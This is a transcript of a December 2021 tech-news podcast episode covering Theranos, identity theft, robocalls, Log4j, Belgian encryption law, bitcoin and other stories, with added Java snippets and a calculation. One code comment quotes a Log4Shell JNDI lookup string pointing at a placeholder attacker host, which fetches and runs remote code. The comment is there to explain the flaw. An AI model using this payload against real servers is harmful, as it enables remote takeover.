Welcome to TechStuff, a production from iHeartRadio.

Hey there, and welcome to TechStuff. I'm your host, Jonathan Strickland. I'm an executive producer with iHeartRadio and a lover of all things tech, and this is the tech news for Tuesday, December twenty-first, twenty twenty-one. Before we get into it: the rest of the episodes this week will be classic episodes, in order for us to take some time off for the holidays. I hope you guys enjoy that. We will have a couple of new episodes next week. My hope is to have some episodes that wrap up the year in tech. Those are gonna be some doozies. I'm sure it's gonna be more than one episode, but I have not actually written them yet, so we'll see. But let's get to the news for today.

The trial of Elizabeth Holmes, the founder of the company Theranos, is now in the hands of the jury. They will meet for a second day of deliberations today to determine a verdict for Holmes, who is facing eleven charges of wire fraud and conspiracy to commit wire fraud. Now, in case you managed to miss out on the Theranos story over the last decade: Holmes founded a medical startup company with the goal of producing a device that could run a battery of tests on a single micro-drop of blood. Holmes has said that her fear of needles and a desire to democratize medicine drove her to found Theranos, and if the tech had worked, it could have truly revolutionized medicine, potentially to the point where a household would have its own Theranos device, almost like a desktop printer, and they could use it to run tests and share that information with a physician. But unfortunately, as was slowly revealed in a series of exposés and documentaries and testimonials, the tech just could not live up to that promise. That didn't stop Theranos from raising nearly one billion dollars in investments over the years. And that's kind of the nub of the case.
Did Holmes knowingly misrepresent what her technology could do and how it performed in order to get investors and partnerships with healthcare companies? Did she intend to mislead them? That's what the jury has to determine. She certainly adopted a lavish and eccentric lifestyle, and there are records of her interactions with employees who brought up concerns with her that seemed to indicate she was not keen on accepting the possibility that the whole endeavor was fruitless. But her lawyers have argued, essentially, that she was just as bought into the hype as her investors were, which would mean she did not purposefully lie to anyone. Honestly, it's a pretty tough call from a legal standpoint, though I think it goes without saying that what the company did was wrong and an enormous amount of money was wasted on this. Not only that, but for people who were depending upon blood tests to come back from Theranos, that's another matter entirely, right? That's a level of criminality that goes beyond just fraud; there are people whose health is at stake here. Anyway, we may have a verdict later this week, but as I record this episode, we're still in the deliberation phase.

And now, to transition into the cybercrime part of this episode, buckle down, folks, there's a lot to cover. First up: according to a company called Aite Group, spelled A-I-T-E (I don't know how you say the name), nearly half of all Americans were victims of some form of financial identity theft in twenty twenty. That is a really crazy statistic. Now, if I were being flippant, I would suggest that it's the other half of all Americans who stole the identities of the first half, so if you're not in one group, you're in the other. But that's obviously not true; that's just a bad joke. Losses from those incidents amounted to more than seven hundred billion dollars, according to this research firm, which published its findings in a paper titled "U.S. Identity Theft: The Stark Reality."
A big slice of that crime pie goes to folks who committed some form of unemployment identity theft, using false information to claim unemployment benefits. So, just to be clear, the folks who were abusing unemployment weren't necessarily people who didn't want to work. That was the common narrative you would hear from certain circles, right? Like, you can't boost unemployment, it will just encourage people not to work. No, it turns out the people who were really abusing the system were thieves who were victimizing other people and stealing from the system in order to fund themselves. They weren't layabouts; they were actively victimizing folks who deserved unemployment benefits.

By the way, if you're between the ages of thirty-five and forty-four, well, congratulations, you are in the prime target zone for those kinds of attacks, because that age group represented the highest percentage of consumers who found themselves victimized in twenty twenty. The report also found that Kansas, Rhode Island, Illinois, Nevada, and Washington were the states with the highest number of identity theft reports. Now, when it comes to fraud, the states that top that list were Nevada again, Delaware, Florida, Maryland, and my home state of Georgia. The number one state, as in the state with the highest number of reported cybercrimes, was Kansas, with one thousand, four hundred eighty-three reports per one hundred thousand people. The safest state was South Dakota, which had just seventy-two reports per one hundred thousand people. However, if we take territories into account, the real prize goes to Puerto Rico, which only had fifty-two reports per one hundred thousand people. But wait, it keeps getting worse.
The report points out that there have been some big data breaches and cases of companies failing to secure data over the last year, from a case where more than two million records from Microsoft customers were found on the web unprotected, to the ransomware attack on Colonial Pipeline that interfered with fuel transportation and distribution earlier this year. So yeah, bad news.

Meanwhile, there are the robocalls, another branch of scams and crimes. T-Mobile released an end-of-the-year report on scam calls and robocalls, saying that the number of calls more than doubled over the course of the year, so that in January there were around one point one billion scam call attempts and in November there were two point five billion. And people wonder why I never pick up my phone anymore. Anyway, T-Mobile says it already blocked more than twenty-one billion scam calls this year through its Scam Shield service. Even so, scammers were able to siphon away nearly thirty billion dollars from targets. Now, according to T-Mobile, more than half of those calls came in the form of a scam vehicle warranty message, and I can say I've actually received some of those, at least the few times a scammer actually bothered to leave a voicemail, that is, because I don't pick up the phone. And you know, that's actually pretty rich, because there's no car in my name, so I don't know what I'd be getting a warranty on in the first place. Following up on that are calls that claim to be from the Social Security office, which suggests a focus on older targets. And the Federal Communications Commission, or FCC, has really been going after robocall operations in the United States, levying hefty fines for companies found to engage in the practice and pushing for telecom companies to institute systems that would eliminate stuff like spoofing.
Spoofing is when a scammer uses a bit of software to make it seem as though the call is coming from a different phone number, often one that appears to be local to whatever the target's phone number is, in an effort to convince them to pick up. Like, you're more likely to pick up a phone if the number looks somewhat familiar. That's the thought process.

The UK's National Crime Agency and National Cyber Crime Unit found a database containing two hundred twenty-five million stolen login credentials for various services and websites. The agencies handed this cache of data over to a service called Have I Been Pwned; that's pwned spelled p-w-n-e-d. That service gives folks the chance to search their own email information to see if any of the accounts that email is part of have been compromised in the past, and if their passwords have been exposed. So it's really a way for people to take action and see if their login credentials are still safe. This is also a good time to remind you all that it is important to set strong passwords. Do not use the same password for multiple accounts. I know you all know this, but I'm gonna say it anyway. Also, I find that password vault programs really help with this, because that way you don't have to remember two hundred unique strong passwords; I totally get that that's not really feasible. So a good password vault is invaluable. And finally, if a service that you subscribe to offers two-factor authentication, definitely activate that, choose that option. It will really cut back on the chance that someone will compromise one of your accounts.
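Have I Been Pwned also runs a companion Pwned Passwords API, and it's a nice illustration of how you can check a credential without ever handing the credential over. Here's a minimal sketch in Java (assuming Java 11 or later for the HTTP client); only the first five characters of the password's SHA-1 hash leave your machine, and the example password and class name are just placeholders for illustration.

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

public class PwnedPasswordCheck {
    public static void main(String[] args) throws Exception {
        String password = "correct horse battery staple"; // placeholder example

        // Hash the password with SHA-1 (that's simply how the corpus is keyed).
        MessageDigest sha1 = MessageDigest.getInstance("SHA-1");
        byte[] digest = sha1.digest(password.getBytes(StandardCharsets.UTF_8));
        StringBuilder hex = new StringBuilder();
        for (byte b : digest) hex.append(String.format("%02X", b));
        String prefix = hex.substring(0, 5); // only this 5-character prefix is sent
        String suffix = hex.substring(5);    // the rest stays local

        // Ask the range API for every known suffix that shares our prefix.
        HttpClient client = HttpClient.newHttpClient();
        HttpRequest request = HttpRequest.newBuilder(
                URI.create("https://api.pwnedpasswords.com/range/" + prefix)).build();
        String body = client.send(request, HttpResponse.BodyHandlers.ofString()).body();

        // Each response line is "SUFFIX:COUNT"; a match means the password has
        // shown up in breach data and should be retired.
        for (String line : body.split("\r?\n")) {
            String[] parts = line.split(":");
            if (parts.length == 2 && parts[0].equalsIgnoreCase(suffix)) {
                System.out.println("Seen " + parts[1].trim() + " times in breaches.");
                return;
            }
        }
        System.out.println("No match in the Pwned Passwords corpus.");
    }
}
```

The account-by-email search described above works through the Have I Been Pwned website and a separate, authenticated API; the password check sketched here is the part you can script freely.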
We have some more stories to cover in this episode, but before we get to that, let's take a quick break.

Okay, we're back, and we're still talking about cybersecurity. You might remember that I did a recent episode in which I talked about a zero-day vulnerability in Apache's logging library, Log4j. Tons of companies, tons of systems and services all rely on Log4j, and as the name suggests, Log4j logs data; it's essentially about keeping a record of what's going on within a system. Anyway, this particular vulnerability would allow someone like a hacker to reach a system running Log4j and potentially execute whatever code they want, code that could give them full control of that remote server, just by using this vulnerability in this logging service. Apache issued a patch to fix the vulnerability, but you have to install patches, right? Just because the patch is there doesn't magically solve the issue and cure all these systems that have Log4j on them; you have to actually install that patch, and the problem is that not everyone is super responsive. Not everyone jumps on that right away. Sometimes it's not necessarily the fault of the company; maybe their system is so huge and diverse that rolling out a patch actually takes a lot of time. That means that while there are technically fixes to this problem, not everyone is actually incorporating them, not to the same degree or at the same speed. So some systems, perhaps tens of thousands of them, remain vulnerable, and likely some of them will remain vulnerable for years to come.
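To make the shape of the problem concrete, here's a minimal sketch, in Java, of the kind of perfectly ordinary-looking code that turned out to be exploitable. The class and method names are hypothetical; the point is just that logging text an attacker controls was enough.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {
    private static final Logger LOG = LogManager.getLogger(LoginHandler.class);

    void handleFailedLogin(String username) {
        // On a vulnerable log4j-core 2.x release (CVE-2021-44228, "Log4Shell"),
        // logging a value the user controls is enough: a username such as
        //   ${jndi:ldap://attacker.example/a}
        // makes Log4j perform a JNDI lookup while rendering the message, which
        // can fetch and run code from the attacker's server.
        LOG.warn("Failed login attempt for user {}", username);
    }
}
```

The durable fix is upgrading log4j-core to a patched release; the mitigation flags and workarounds that circulated early on turned out to cover only part of the problem, which is one reason the cleanup is taking so long.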
Meanwhile, a hacker group called Conti, known primarily for ransomware attacks, has developed an attack chain that leverages the Log4j vulnerability. Conti is a prolific ransomware hacker gang. They're based out of Russia. They're potentially state-sponsored, or at least state-sanctioned, meaning the Russian authorities have shown very little interest in shutting down this hacker group. And security experts at AdvIntel say Conti's scale is really large, it's a big operation, and their methods are very sophisticated, which makes them particularly dangerous. It sounds to me like twenty twenty-two is going to be another big year of big ransomware attacks. It really drives home that organizations will need to spend a lot of time and resources to patch vulnerable systems, which, again, is a process that's laborious and time-consuming. So you know, it's a big mess: it's absolutely critical, and it's also not easy to do. A fun combination.

Over in Belgium, the Ministry of Defense recently announced that the department was the target of cyberattacks, and that, yes, the attackers exploited that Log4j vulnerability I was just talking about. According to the department, quote, "some of the Ministry's activities were paralyzed for several days," end quote. Now, it sounds as though staff detected the attack fairly early on, and they were able to sequester the infected systems and thus compartmentalize their computer systems, so that the ministry could mostly continue doing what it does while simultaneously containing the threat to the affected systems. As I record this, no one has yet identified the attackers, so we don't know who was responsible. It is a pretty scary story, right? A country's defense ministry being effectively targeted by hackers. It's not out of the ordinary; I mean, we know that cyber warfare is raging all the time, we just don't necessarily know about it most of the time. But to see something like that is incredibly sobering, because obviously you could have hostile countries really disabling the functionality of massive and critical infrastructure in other countries. Very scary stuff.

But while I'm talking about Belgium, I should also mention that back in June, the government of Belgium proposed a law that would require companies that run encrypted messaging services, like WhatsApp and Signal, to include a tool that would decrypt communications upon request by authorities in the course of criminal investigations. Of course, doing that would completely invalidate encryption in the first place.
I mean, the whole point of the system is that no one other than the parties involved in that communication is able to decrypt the messages, not even the service provider. That's got to be key to an encrypted messaging service, that the service itself cannot decrypt the messages. To incorporate a workaround would negate all of that. It would also require an entirely different approach to providing the service, but that's another matter. Anyway, once the public learned of this part of the law, criticism followed. Many rightly pointed out that creating a back door in a secure system means you've just removed any security from that system. A back door, when you really break it down, is a vulnerability, and people can learn about and exploit vulnerabilities. So generally speaking, you want to identify and eliminate vulnerabilities, not introduce new ones. One analogy I've used is a bank vault: you can have one of those big, massive vault doors that totally locks in place and has time locks and all this stuff, and it's really hard to break through. But if you install a screen door in the back of the vault so that you could just, you know, come in and out more easily, then you've invalidated that giant door, right? It doesn't matter. Same sort of thing when we talk about back doors in secure systems. It is a terrible idea. Fortunately, the Belgian government listened to the criticism and has subsequently removed the decryption requirement from that law.
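For a sense of why the provider genuinely has nothing it could hand over, here's a minimal sketch in Java of the idea underneath end-to-end encryption, using X25519 key agreement (available since Java 11). Real messaging protocols such as Signal's are far more elaborate than this; the names below are just for illustration.

```java
import javax.crypto.KeyAgreement;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.util.Arrays;

public class EndToEndSketch {
    public static void main(String[] args) throws Exception {
        // Each party generates its key pair on its own device; private keys never
        // leave those devices, and the messaging server only ever relays public keys.
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("X25519");
        KeyPair alice = kpg.generateKeyPair();
        KeyPair bob = kpg.generateKeyPair();

        // Alice combines her private key with Bob's public key...
        KeyAgreement aliceKa = KeyAgreement.getInstance("X25519");
        aliceKa.init(alice.getPrivate());
        aliceKa.doPhase(bob.getPublic(), true);
        byte[] aliceSecret = aliceKa.generateSecret();

        // ...and Bob does the mirror image with his private key and Alice's public key.
        KeyAgreement bobKa = KeyAgreement.getInstance("X25519");
        bobKa.init(bob.getPrivate());
        bobKa.doPhase(alice.getPublic(), true);
        byte[] bobSecret = bobKa.generateSecret();

        // Both arrive at the same shared secret, which seeds the message encryption keys.
        // The server never holds a private key, so it has nothing it can use to decrypt.
        System.out.println("Secrets match: " + Arrays.equals(aliceSecret, bobSecret));
    }
}
```

Because the private keys are generated and kept on the users' devices, a "decrypt on request" tool can only exist if the provider changes this design itself, which is exactly the criticism the Belgian proposal ran into.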
Now it's time for a couple of Bitcoin stories. Bitcoin: the choice for money launderers around the world. So, an employee of Sony's life insurance company allegedly embezzled around a hundred fifty-four million dollars during a financial transfer between two Sony company accounts. Essentially, the job was to move money from one Sony account to another Sony account. It's just that along the way, a measly hundred fifty-four million dollars' worth of Sony's resources found their way into the personal account of this particular Sony employee. That is a heck of a dip into the corporate piggy bank. Then that employee allegedly converted all of that money into bitcoin, around three thousand, eight hundred seventy-nine bitcoin, and the FBI got on the case and seized the bitcoin in question. Today that bitcoin amount is worth around a hundred eighty million dollars. That's not a bad amount of interest, right? It started off as a hundred fifty-four million; now you're at a hundred eighty million. Like, wow. So the Sony employee, now former employee, is under arrest in Japan. No big surprise there. I'm not sure if this means Sony will actually end up with more money than what was stolen from it, thanks to the appreciation in value of bitcoin between May, when the theft happened, and when the FBI was able to seize the bitcoin. That's a question I can't answer. Pretty curious stuff. But yeah, bitcoin continues to be associated with people who are doing some pretty shady stuff. Again, like I've said with a lot of other technologies, there's nothing about bitcoin that inherently makes it bad. It's just that a lot of bitcoin's features are ones that also become really useful if you want to do shady things. So the tool itself is not necessarily bad, although I have other very obvious feelings about bitcoin. But yeah, you see a lot of folks running unethical operations relying on bitcoin.

Speaking of bitcoin, in a report that probably didn't surprise that many people, the Wall Street Journal says that the top ten thousand bitcoin accounts hold five million bitcoins. That's equal to more than two hundred thirty billion dollars.
That would be about ten thousand accounts out of around a hundred fourteen million people who hold bitcoin, and the Wall Street Journal points out this means the top point zero one percent of bitcoin holders control roughly twenty-seven percent of all bitcoin in circulation. So this would be the tippy tippy top of a pyramid, if you were to compare bitcoin to a pyramid scheme. Some folks have tried to do that, although I think it's more of a speculation engine than a pyramid scheme. This is a greater disparity than we see in the United States in general, where the top one percent of the wealthiest people control around a third of all wealth in the US. But one percent is a whole lot more than point zero one percent. Anyway, in the crypto community, the accounts that control a lot of bitcoin are referred to as whales, and I'm not sure if the researchers who looked into this differentiated between accounts that belong to, say, a single individual and those that belong to crypto pools or exchanges and that kind of thing.
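As a quick sanity check on those figures, and with the caveat that the roughly 18.9 million coins in circulation at the time is my own outside number rather than one from the report, the arithmetic works out like this:

\[
\frac{10{,}000\ \text{accounts}}{114{,}000{,}000\ \text{holders}} \approx 0.009\% \approx 0.01\%,
\qquad
\frac{5{,}000{,}000\ \text{BTC}}{\approx 18{,}900{,}000\ \text{BTC in circulation}} \approx 26.5\%.
\]

So the "point zero one percent" framing and a share in the high twenties are both consistent with the raw numbers the Journal cites.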
Moving on, let's talk about Amazon, because there are a couple of big stories there. One is that Reuters reports that Amazon scrubbed negative reviews of Xi Jinping's book The Governance of China. Xi Jinping is the president of China. Apparently Amazon was told to strike any review that wasn't five stars from its Chinese-operated sites, the sites that operate within China, and the company subsequently removed and disabled reviews for that book. This happened about two years ago, and the report drives home how big tech companies will often enable authoritarian regimes if it means getting access to their very large markets. China has more than one point four billion people in it, and so big companies naturally really want access to the money those people may or may not have. And if that means the company has to engage in a little censorship, or perhaps enable a propaganda arm of an authoritarian regime, well, in many cases that's kind of waved away as the price of doing business. It's never framed that way, by the way; no one would ever frame it that way, because it would just be a PR nightmare to say the quiet part out loud. They always frame it in a way where they claim that they're giving access to more information. But if it's information that only goes through a government filter before it gets to people, I don't really buy that argument. Anyway, considering China's record on stuff like human rights violations, this is pretty darn insidious, but it's also not surprising, which is incredibly sad.

All right, we have several more stories that we need to finish out before we close this episode. But before we do that, let's take another quick break.

Boeing and Airbus have issued warnings that 5G technology rollouts could create problems for the aviation industry. The warning says that 5G radio waves could interfere with aircraft electronics like radio altimeters. This follows a warning from the Federal Aviation Administration, or FAA, that also said 5G interference could cause flight diversions, which obviously is a pretty serious problem. Companies like AT&T and Verizon have delayed their activation of 5G networks while working on this issue, looking to adopt precautionary measures to limit 5G interference. But Boeing and Airbus claim that these proposals don't go far enough, and they want to see a commitment to limiting 5G so that it doesn't operate within range of something like forty of the world's major airports. The US wireless industry is pushing back against this, saying that the aviation industry is distorting the truth, essentially claiming the problem is way worse than any actual problem that might exist, and arguing that delays in 5G rollouts cause harm to companies and consumers alike. I may have to do a full episode about this in the future and really look into what's going on at a technical level, because I honestly don't know which argument here is the most realistic.
Musician Brian Eno has a pretty skeptical perspective on NFTs, which means he and I share that in common. Also, I used to record in a podcasting studio named after him; all our podcasting studios at the office are named after musicians, like Eno, Bowie, Prince, and Yorke. Anyway, Eno says he feels NFTs are being peddled by the equivalent of snake oil salespeople and marketed to suckers; hucksters and suckers, I think, is how he put it, which sounds like P.T. Barnum would be all over the NFT market if he were alive today. I happen to agree with Eno on this. Should we actually build a metaverse (and you can listen to yesterday's episode to hear my thoughts about that), then NFTs could arguably be useful if you wanted to port digital goods from one environment into another, though that process would also require that a lot of other pieces fall into place, and it's by no means a guarantee that it would actually happen. But right now, NFTs are really just a digital record of a transaction, and you don't actually end up owning anything tangible, at least not in the sense that we typically think of. I've often said it's kind of like buying a star, if you've ever seen one of those commercials: you don't really own anything, and there's no way to say, hey, that's my star, so no one else can buy it. There's nothing stopping some other company from saying, well, we're selling stars, and that same star ends up owned by like eight different people. I mean, not that anyone would really care or do anything about it. It's just meaningless, is what I'm saying. Anyway, one thing NFTs can do is allow fans of an artist or creator a chance to support that person's work and show their enthusiasm for it. So if an artist works primarily in web-based media, it can be difficult to monetize that work.
You might create a Patreon account or something like that, but there are fundamental differences between an artist who works in the digital realm versus someone who works in a physical form of media. NFTs can be one way to financially support artists, but that's not really how NFTs are marketed. They're pushed more as status symbols or speculative investments, and I feel that that's pretty harmful, and that's mostly what Eno was getting at. You can read up on what he has to say at the Crypto Syllabus website, under the article "Brian Eno on NFTs and Automatism."

Finally, New Scientist has published an article titled "Human brain cells in a dish learn to play Pong faster than an AI," which is all sorts of clickbait for yours truly. The headline appears to have been engineered in such a way that there's no way I could avoid clicking on it. It brings to mind something like a Frankenstein film, in which a doctor has a little bit of brain matter in a dish, and he's watching a screen and sees a paddle hit a ball on the screen, and then proclaims, "It's alive! Alive!" But what is actually going on here? All right, well, some scientists at Cortical Labs took living brain cells, incorporated them into a processor, and connected that to a, quote unquote, virtual game world. A large discipline within AI and machine learning is the creation of what are called artificial neural networks. Well, this is kind of similar, except it's using actual neural tissue to serve as neural nodes.
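For comparison, here's a minimal sketch, in Java, of what a single node in a conventional artificial neural network does: weight its inputs, sum them, and pass the result through an activation function. The weights and inputs below are made-up numbers purely for illustration; the novelty at Cortical Labs is using living neurons in place of this kind of arithmetic node.

```java
public class ArtificialNeuron {
    private final double[] weights;
    private final double bias;

    ArtificialNeuron(double[] weights, double bias) {
        this.weights = weights;
        this.bias = bias;
    }

    // Weighted sum of the inputs plus a bias, squashed by a sigmoid activation.
    double activate(double[] inputs) {
        double sum = bias;
        for (int i = 0; i < weights.length; i++) {
            sum += weights[i] * inputs[i];
        }
        return 1.0 / (1.0 + Math.exp(-sum)); // sigmoid
    }

    public static void main(String[] args) {
        // Arbitrary example values; training would adjust the weights over time.
        ArtificialNeuron neuron = new ArtificialNeuron(new double[] {0.8, -0.4, 0.2}, 0.1);
        System.out.println(neuron.activate(new double[] {1.0, 0.5, 0.25}));
    }
}
```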
I would love to tell you more about this, but the article is distressingly short on details, and Cortical Labs' own website gets a bit loosey-goosey with its language. For example, a blog post from just a couple of days ago, called "What Does It Mean to Grow a Mind?", reads, quote: "We don't know what we're making, because nothing like this has ever existed before. An entirely new mode of being, a fusion of silicon and neuron, a native to the digital world, lit with the Promethean fire of the human mind," end quote. So they don't really know what they're making. Well, nothing could go wrong there, you know. I'll set aside my pessimism and skepticism and need to know more, and just say that biocircuits are fascinating, they come complete with their own set of ethical issues to consider, and they might also end up being the backbone of a new branch of machine learning and AI.

And that's it for this tech news episode of TechStuff. When we come back later this week, like I said, we're going to have some reruns of classic episodes, but we'll be back next week with some new ones. I hope everyone out there is having a safe, healthy, and happy holiday season. I know that is incredibly challenging considering the way things work today, but I still hope you're all well, and I look forward to talking to you again really soon.

TechStuff is an iHeartRadio production. For more podcasts from iHeartRadio, visit the iHeartRadio app, Apple Podcasts, or wherever you listen to your favorite shows.